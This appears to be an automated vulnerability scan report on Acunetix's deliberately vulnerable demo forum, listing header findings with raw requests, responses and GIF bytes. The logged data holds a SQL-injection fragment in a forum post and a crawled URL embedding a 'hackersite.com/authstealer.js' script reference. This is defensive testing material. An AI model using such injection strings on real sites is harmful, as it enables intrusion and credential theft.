3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 239 |
| Solution |
Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header.
|
| Reference |
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy
https://developers.google.com/web/updates/2018/06/feature-policy https://scotthelme.co.uk/a-new-security-header-feature-policy/ https://w3c.github.io/webappsec-feature-policy/ https://www.smashingmagazine.com/2018/12/feature-policy/ |
| Tags |
OWASP_2021_A01
OWASP_2017_A05 |
| CWE Id | 693 |
| WASC Id | 15 |
| Plugin Id | 10063 |
|
Low |
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) |
|---|---|
| Description |
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/%C2%94http:/hackersite.com/authstealer.js%C2%94 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 327 bytes. |
GET http://testasp.vulnweb.com/avatars/0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 404 Not Found
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1245 |
| Response Body - size: 1,245 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/avatars/noavatar.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 338 bytes. |
GET http://testasp.vulnweb.com/avatars/noavatar.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:28 GMT Accept-Ranges: bytes ETag: "92c8971f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 950 |
| Response Body - size: 950 bytes. |
GIF89addæÿÿÿá
üüüþþþúúúûûûÿþþá þþÿå1:ÿÿþæ:Bã$þÿþÿþÿáímrìzèMTä*3õ²µêU[öööä$-ìdjò«®çFMï â!æ/8ââï úÕÖùùúûúúò¥§æBIé_eìqvó»½ñíùÌÎç@GòöÑÓþúúùññ÷æçä(÷ââúÜÝùùùâ÷÷÷úêëýýýð÷ÝÝýóóñ¿Áêioâ!èCJøÇÉñ´¶ôÉËþÿÿðûßàî|îóÝÞïøÞßøõõîqx÷÷øø÷øþüüûàâíöÁÂùÓÔöÚÚîw|ôÆÈûøøòúÙÚíáûÝßäó¡ë`fúÏÑûÞßã&ð°øøøèHNýïï!ù,ddÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÀרÙÚÛÜÙÄ å 9Q9à×óñóàÆDé Y¨èÀ WH'Hß¾g^t@±bE(¼Æã A Æ(-ÚHá,Ä0+61°Ìå1@ Í8q²D!¨Q4øôÁ Éà AZ°iCL±1R ¥-Sn(Fìÿ(Tè°`¸]R.Ø8CJ[@9¡ )¿ v¥\P°AÊÄ.¤tbAÊ=,hHÙXØ o$H â:I)äIe TH©Øj*ÌDjñB&¿C æå3pD §C¢ V¸;L0 0&Øñ¸ @ÀX`Ô'ФÄ0H AÀî§`t ]`ÃP ,0ÀH¨á°üp.HH(¦¨â,¶¨â.Æ(ãÕÔhã8æ¨ã<öèã@)äDiäH&©äL6éäPF)åTViå«; |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Images/logo.gif |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 313 bytes. |
GET http://testasp.vulnweb.com/Images/logo.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 248 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:31 GMT Accept-Ranges: bytes ETag: "ceff952185c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4933 |
| Response Body - size: 4,933 bytes. |
GIF89a2&÷HÍHå0¶0¨ò¨$«$îâHÄHªîëxÝxTÑTlálTÚTêHÒH0Ò0ôýîï0Å0TÌTÅÞ0º0ÿÿÿÆÍlÖlñ`Î`£0Î00Ì0`Ø`0°0`Ë``â`0®0lÑl¾HÙH±í<Å<0Ê0xâxxàxlÚlTàT`Þ``Ü``Ó`µHÜHHÚH¶xåxÊx×x$¾$`Ú`TÞT$Î$ÿÿ¿á
ËÊÌÉ???ÃÆÈÇ¿¿¿£½Ä§º¾°ÂÀ¢µ¸¤¨¶±¿ ¡ÁÅ»¬¹©®ª´¥«¯¼¦·þþý²³ïïï///___OOOÏÏÏ0Ç0ðßßßí¯¯¯`Ð`´ú´ñ´ù´`Í`oooá é`É``Ì`å1:¨ø¨´û´´ü´æ:Bã$xèxíøĘ̂÷¨êU[ímrä$-èMTä*3áTÄTìdjçFMüééå0¾0ítz`Ñ`æ/8ò²´â!ââöÂŨõ¨ðìä(üâãõ¼½öר<×<é_eò`Õ`xëxô¨¬ç@GèCJâ!ó£§êioúæçûÞßHÊHæBIïâlÝl$É$®<¼<òñ¦¨òH½HõÌÍýïïüäå÷ÓÔùßáúìì<Ú<TÖTñ±<È<ï}äáèHNã&ôÅÇë`fÐ$À$lçlõ°³ùØÙ¿HÕH$Ò$ö²µxØxïïñ £ë$¸$òº½üíîTÊT!ù,2&ÿ()Bp`II°I&B|ò¤IET2RѲq£Z¶¥d:'éгRK1Pbf¥¦Í@8ËèÜÙ¥ç.wî¼ú¢gàYz¥é5OÕ¨áCÕ«_¾¬Ñºf ¯zÂêé3¶O:h¥Í#HP<~âúC·M1vÛÚ[È_¿{f ÃØJø±;` <§²å?¹hæs7ݸ1CtÓqȨVí¤µk/^Àö"¶9r¤èÞ]¥÷ßU¦_BøãK7r¹çHABسkßν»÷ïàÃÿO¾¼ùóç EÎ9rá¿«H©wíÖ«ã#Z´fÌÌ1Yd b ahìaÈ^yÑåÇ[l¡Ext TñÕI5ÔO?éH#ÆäJ(E1ÒGT<Ñ"E1¤@JXÞ8æ¨ã<î¨{Ï)wDq¿ÅGßmµÅ¶§&ZgÿY6%V`ro©UY~µÕR%USI}TO]h'¦¨â eDQE9ÄPBac*è j÷ãtA"G¤»Ý~ª5iFa& T`iI×p½ ÖaUh¡UÉaCõ´N5Áÿ 'J(m1'w¨'}Öx]¡À+ì°R']{Æ-_|ºÙkê7iÔF)àih``{åðβåå¦fE¦N-EÔO®RF&Æ©¢,Úyg2$ÐÄöëï¿èz¬{Dö&_³I*É$jV¥×RYàaWî!%Bd<F¸~ ¦©c¹!¾Ánï8,¥h«Hõ¶g3îû+À8ç,%XAè@6§qðõ¶[®9Áä~ÓVËEMibÛúñÕúáÖ¸¥VH&ª¦[òÉnÆÊ2%Á3»*4#¿:Ç-wa÷!2]Ð/ÿk0ÂÏ*½piM?ýtI rµÆrê±X^.%2N%Î$ï¼tÖ{ï{æ[Ü9Êc,¬,K*çãÍÜ´{çÝDH·±¿ç·ÑÎ>´Óþ1¶F$W["B5tAØÖäZxîå$eò¯ªìùi«Í9ÔöA6ë8A6·áþûïïÊ)µÇm Ý>g·H#ül,{B²c´fÑæQùaÚ'%MAÌËX5ìÂ¥¶p-L!Ù:´½ ¡{ÓÙLB¯µ±MOÑêÌ]Àï /\4ê³û!ÃZïX´Ö'pÃ+Íÿ µ9<¦J @AEL¥ÓÌt¦¥°jM¯2Ûk%¾½O22¯p4 ~Ôh ÿeC K`Ú¤Ù(a {xDm¡A àÆ¤ç1²éBRÕRÆÆ&Á*&³ÓÆ+|ñªO+,ZqÆN¾¯kìWûG¡)¿in'8I-¦È- ²KÔ ®§H£EsíRY¼XbQRW»Ê×@2 MnÂÜ*B9¬Q«r ;! !°àR¸A Jha¥@ BñpÆ3§°ÐÀ®öÿP k=Æ h`p+5HèÔagÀ@%&ÚHxÀ<ÁÑDáûÀĸÁ`àðU³1gÏ&4ÕèJ0wL D¬,pGHÝÁGèn§==ªvxêÓì È%;Fè´;ªÝ¼aç©°Û" úU²fà©XpÄv$ÑÓ¦çPÑ1妰ztóq?¸DÆ"À8îqBè®Ä¥aa~X!`c~@c zÊ]¸-àP« ¨¸Z&Lt5ܰ#XÁ>8Äm¼ÙxL!ÓÚÿÃÝ +îp÷T»mØ-îüq§¸DÐU*\»=b;Ъp¡ÖPU¸LÀÎr±cCExU»vs«xt¤öÌUÅ^É6ÍXaX!L¢0ìcý`÷ aåºÚ·ÙÎf(: mÆF§« ±@c/PºÐÝ .dê WÈtÛA.¸Þ4¹Ù±!1Ö ¸Æ ±o³sÝcÁ 6ÅR£k7«âøÄ(«nÇUë!»ØA.3\F¼*Î8{׫ñUip¯fâ+ùR©¾EC~÷ØÔ½-°Pó3Xÿìh! XL`¢±w¾&Î7§$E-Nh$C¤Æ7´S7»»Áqѱ~w§ùC®,i#a>±[û\í ÷ÑÖï3pâçÚ°ouâ*$â ãj gл×Ö´÷j AX.pÙËv3aöPË»0àq hAÎ\1Ö¶(8ëYW)XðÜã.ð<8c ÁLg!ìÉmé7rqÆM°¢;ñpá}¡G;ÀSí¶êãÆØÔ¦ªw·s»g§ÒèN¥j#¯Òø®"ª[õË9<ÔkÆ6p° X¹5?ÿ¸Z)°Fürb óÇ«ò. ¸ÔÒùYy\ÄöæF~;Ü F÷Hp5hD«° e{Ô[Ø9E*n1 ~gàé8ã(´sb¥j§Ò(fõÁ»£i§ÝâÝùwÞ3+ØýîZMñÚ·«GDÚÑ«Nv5 üM "DkJpµHË?Æ&,¶MKSp Èèú«ÑLÍ«âRÞ¼¦.Î@^qµW¼¨W{ýXØQÅ[_² q§µ£[á¿íkçôÛù¾¹«¸¹»Õû {dî wý<ïäJ«]oMÿ3¦@È{ò3¯|Æn>«)`zf9ç·rÙ & ôÞ¸3v9àj#p'°u Á'FußQFfäPf$ ØA għÞ\Æm·pÕÇÎg7À$X&(}nÄ|ÒG¥¼Ó;Ý1ßw0r~NP W³ ã0ð%yÒµlÍÖ~ó~¢ò1´@à öçfWmrz1QZ&ñ3¯{ïö6è«pFý¬`F®0g[v]|F}!èpâQq*8iG×që(æµê%¢px ¨xNÀxNÿÂ\æWfÌfywÑW£ma³p5üÀBàö÷fÀ&T(V¨"X(ZHèn¦s:_ØôCgpF¸ÅpFÆ ?vsUÛvÂH|ÈÈy'|urw=ÖàFzøÆÁk.øÙ´ W#C'ç)p5¨¤ÐÖlSW£Bm°Oó*ð%Ïv5]õVôfÀ.1ذ2Wã iÓ¯ø±Ø èã'µÈëpFÝÒpFì©pFú0pØþ&i×GܸVÜ5FptwxèiB};µw#ÿ\%édO6kqT2ð8p"·^N 3 NPò8¡Ð ð8äPëGAÕ<1 WxtMØKð8Àç1°BÀ"á[1(daaÛ±f4 ` 1?«v C½øp=vT bo§UC@ØqÖ U-w ¯Æq [^u])k7KàþÕk%póAH@è_6 fa)6pÐnFI'$0/n \(FIehF ¤{9·Cà°T»ÕZøv~;D S$©$;)©j0ÿ)^×I'6bßuHæç~gJÉ!ðÐX¢®¡¼XÕòîÕSsëç)~ÐgX`=¹*Fñþ¤1Éh'±B5CÚA[wŰaCð íCÀÀVÐ+æØwÒµ[;;Ôµ{h1©|Øuiì ^;*U"kß4¤(ÅqC6¨;Ð ôðWó(0 C=À ô J2GYu+S Ú"9sYÛ" ?Ìðâá¡/ÄÜq°LÀ@¤ÛA X@IõSÀ$ÿ¨ ĸ#ðÊiE;PVk47À, <Â$)P Ð3(à: @.-Yrw0 ³À6A=w`Qà@"iÚ2ÅT'ö23ïÆ+´ùðB äñî³ â@Màª};´(FBH)d°CD-ð4QcXÉ âÒqKÕ³e*j°H¿LïRoò*6Qã#3`4ñF ¤@ ±P¢ò¦ À«x®K(QÆCEr0u$<£ë:¥¯³%5¢<E_ÿi9aã ÛHï"Bqâ2jãEȤ¡ná{´qMH:G&{²¡£á0Ó²!KÛB«1Ë%Eb2þú¯d2Û³9Þ/r">$aÔ+F´nû/p$§D@t´JÂãxG,5U[ Pò%rKw_Q.S.yEÔ&$+òò2,¢.Bj;{mû¶ûFÞ,À0)Bä4î1~;«  M.\s¸Ö£A°2>ë¬sB'ñE4CÕº¹Àë/F*·Éò;Í"³aN®4DÖ<~D«"H®{Aaj9#¶jâ*=+?û¬&Ä6ÿû»Á;¾ÁRJAÉ´&ë,Ð");X)T+Kr%ô*H%.G¬BE«ÂAÛ#"ÛIÎÊEº¶øÒAK¾ #@»,Ìb@É+8KÓ4P5RÓÊ)µ*³â"Óµù*³K¬¥W6Íê¬/3Àö¾¾ë+1#A¼²'æy#Q¹Á>¬°#A&A+*Á/á46q9±:Á& "Dá!J¡LáP!SQWaY±]á`!dagkÑo!sQ¶j|Ña1 q¡á!a 